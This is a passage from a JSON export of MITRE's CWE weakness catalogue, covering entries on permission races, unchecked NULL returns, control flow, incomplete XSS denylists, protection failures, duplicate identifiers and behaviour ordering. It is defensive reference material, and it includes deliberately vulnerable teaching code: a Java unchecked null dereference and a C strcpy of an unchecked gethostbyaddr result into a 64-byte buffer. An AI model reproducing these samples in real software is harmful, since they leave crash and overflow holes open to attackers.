Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0760","Description":"Archive extractor decompresses files with world-readable permissions, then later sets permissions to what the archive specified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0760"},{"Reference":"CVE-2005-2174","Description":"Product inserts a new object into database before setting the object\'s permissions, introducing a race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2174"},{"Reference":"CVE-2006-5214","Description":"Error file has weak permissions before a chmod is performed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5214"},{"Reference":"CVE-2005-2475","Description":"Archive permissions issue using hard link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2475"},{"Reference":"CVE-2003-0265","Description":"Database product creates files world-writable before initializing the setuid bits, leading to modification of executables.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0265"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"27"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Permission Races", Page 533"}}},"Notes":{"Note":{"#text":"Under-studied. It seems likely that this weakness could occur in any situation in which a complex or large copy operation occurs, when the resource can be made available to other spheres as soon as it is created, but before its initialization is complete.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"690":{"attr":{"@_ID":"690","@_Name":"Unchecked Return Value to NULL Pointer Dereference","@_Abstraction":"Compound","@_Structure":"Chain","@_Status":"Draft"},"Description":"The product does not check for an error after calling a function that can return with a NULL pointer if the function fails, which leads to a resultant NULL pointer dereference.","Extended_Description":"While unchecked return value weaknesses are not limited to returns of NULL pointers (see the examples in CWE-252), functions often return NULL to indicate an error status. When this error condition is not checked, a NULL pointer dereference can occur.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"StartsWith","@_CWE_ID":"252","@_View_ID":"709","@_Chain_ID":"690"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"476","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"A typical occurrence of this weakness occurs when an application includes user-controlled input to a malloc() call. The related code might be correct with respect to preventing buffer overflows, but if a large value is provided, the malloc() will fail due to insufficient memory. This problem also frequently occurs when a parsing routine expects that certain elements will always be present. If malformed input is provided, the parser might return NULL. For example, strtok() can return NULL."}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"This typically occurs in rarely-triggered error conditions, reducing the chances of detection during black box testing."},{"Method":"White Box","Description":"Code analysis can require knowledge of API behaviors for library functions that might return NULL, reducing the chances of detection when unknown libraries are used."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The code below makes a call to the getUserName() function but doesn\'t check the return value before dereferencing (which may cause a NullPointerException).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String username = getUserName();if (username.equals(ADMIN_USER)) {}","xhtml:br":"","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1052","Description":"Large Content-Length value leads to NULL pointer dereference when malloc fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1052"},{"Reference":"CVE-2006-6227","Description":"Large message length field leads to NULL pointer dereference when malloc fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6227"},{"Reference":"CVE-2006-2555","Description":"Parsing routine encounters NULL dereference when input is missing a colon separator.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2555"},{"Reference":"CVE-2003-1054","Description":"URI parsing API sets argument to NULL when a parsing failure occurs, such as when the Referer header is missing a hostname, leading to NULL dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1054"},{"Reference":"CVE-2008-5183","Description":"chain: unchecked return value can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP34-C","Entry_Name":"Do not dereference null pointers","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP32-PL","Entry_Name":"Do not ignore function return values","Mapping_Fit":"CWE More Specific"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Relevant_Properties, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"}]}},"691":{"attr":{"@_ID":"691","@_Name":"Insufficient Control Flow Management","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not sufficiently manage its control flow during execution, creating conditions in which the control flow can be modified in unexpected ways.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":40,"Entry_Name":"Insufficient Process Validation"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"29"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"692":{"attr":{"@_ID":"692","@_Name":"Incomplete Denylist to Cross-Site Scripting","@_Abstraction":"Compound","@_Structure":"Chain","@_Status":"Draft"},"Description":"The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed.","Extended_Description":"While XSS might seem simple to prevent, web browsers vary so widely in how they parse web pages, that a denylist cannot keep track of all the variations. The \\"XSS Cheat Sheet\\" [REF-714] contains a large number of attacks that are intended to bypass incomplete denylists.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"StartsWith","@_CWE_ID":"184","@_View_ID":"709","@_Chain_ID":"692"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5727","Description":"Denylist only removes <SCRIPT> tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727"},{"Reference":"CVE-2006-3617","Description":"Denylist only removes <SCRIPT> tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3617"},{"Reference":"CVE-2006-4308","Description":"Denylist only checks \\"javascript:\\" tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-714"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"added Language_Class \\"All\\""},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Name, Observed_Examples, References"}],"Previous_Entry_Name":{"#text":"Incomplete Blacklist to Cross-Site Scripting","attr":{"@_Date":"2020-02-26"}}}},"693":{"attr":{"@_ID":"693","@_Name":"Protection Mechanism Failure","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.","Extended_Description":"This weakness covers three distinct situations. A \\"missing\\" protection mechanism occurs when the application does not define any mechanism against a certain class of attack. An \\"insufficient\\" protection mechanism might provide some defenses - for example, against the most common attacks - but it does not protect against everything that is intended. Finally, an \\"ignored\\" mechanism occurs when a mechanism is available and in active use within the product, but the developer has not applied it in some code path.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"107"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"20"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"237"}},{"attr":{"@_CAPEC_ID":"36"}},{"attr":{"@_CAPEC_ID":"477"}},{"attr":{"@_CAPEC_ID":"480"}},{"attr":{"@_CAPEC_ID":"51"}},{"attr":{"@_CAPEC_ID":"57"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"65"}},{"attr":{"@_CAPEC_ID":"668"}},{"attr":{"@_CAPEC_ID":"74"}},{"attr":{"@_CAPEC_ID":"87"}}]},"Notes":{"Note":{"#text":"The concept of protection mechanisms is well established, but protection mechanism failures have not been studied comprehensively. It is suspected that protection mechanisms can have significantly different types of weaknesses than the weaknesses that they are intended to prevent.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"694":{"attr":{"@_ID":"694","@_Name":"Use of Multiple Resources with Duplicate Identifier","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses multiple resources that can have the same identifier, in a context in which unique identifiers are required.","Extended_Description":"If the software assumes that each resource has a unique identifier, the software could operate on the wrong resource if attackers can cause multiple resources to be associated with the same identifier.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"99","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If unique identifiers are assumed when protecting sensitive resources, then duplicate identifiers might allow attackers to bypass the protection."},{"Scope":"Other","Impact":"Quality Degradation"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Where possible, use unique identifiers. If non-unique identifiers are detected, then do not operate any resource with a non-unique identifier and report the error appropriately."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2013-4787","Description":"chain: mobile OS verifies cryptographic signature of file in an archive, but then installs a different file with the same name that is also listed in the archive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4787"}},"Notes":{"Note":{"#text":"This weakness is probably closely associated with other issues related to doubling, such as CWE-675 (Duplicate Operations on Resource). It\'s often a case of an API contract violation (CWE-227).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"695":{"attr":{"@_ID":"695","@_Name":"Use of Low-Level Functionality","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses low-level functionality that is explicitly prohibited by the framework or specification under which the software is supposed to operate.","Extended_Description":"The use of low-level functionality can violate the specification in unexpected ways that effectively disable built-in protection mechanisms, introduce exploitable inconsistencies, or otherwise expose the functionality to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"36"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"696":{"attr":{"@_ID":"696","@_Name":"Incorrect Behavior Order","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product performs multiple related behaviors, but the behaviors are performed in the wrong order in ways which may produce resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-9805","Description":"Chain: Creation of the packet client occurs before initialization is complete (CWE-696) resulting in a read from uninitialized memory (CWE-908), causing memory 